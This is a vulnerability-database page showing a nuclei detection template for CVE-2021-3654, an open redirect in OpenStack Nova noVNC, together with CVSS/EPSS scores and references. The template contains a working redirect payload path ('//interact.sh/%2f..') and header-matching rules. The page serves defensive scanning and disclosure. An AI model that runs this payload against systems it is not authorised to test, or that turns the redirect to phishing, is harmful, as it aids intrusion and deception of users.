Lucene search
K

Nova noVNC - Open Redirect

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

Nova noVNC open redirect vulnerability. Attacker can redirect users to malicious sites, leading to potential phishing attacks

Related
Refs
Code
id: CVE-2021-3654

info:
  name: Nova noVNC - Open Redirect
  author: geeknik
  severity: medium
  description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the open redirect vulnerability in the Nova noVNC application.
  reference:
    - https://seclists.org/oss-sec/2021/q3/188
    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
    - https://bugs.python.org/issue32084
    - https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3654
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-3654
    cwe-id: CWE-601
    epss-score: 0.26792
    epss-percentile: 0.97782
    cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openstack
    product: nova
  tags: cve2021,cve,redirect,novnc,seclists,openstack,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}//interact.sh/%2f..'

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

      - type: status
        status:
          - 302
          - 301
# digest: 4b0a0048304602210086752aa6a4d1d9f5eb094c674867858eb1307edb8a504cdc218a524f3de46329022100b6ac62e20d0a9bf286a55479f2967b2cc418abf3a8d16f0480d28fd4956d898c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24
CVSS 3.16.1
EPSS0.26792
42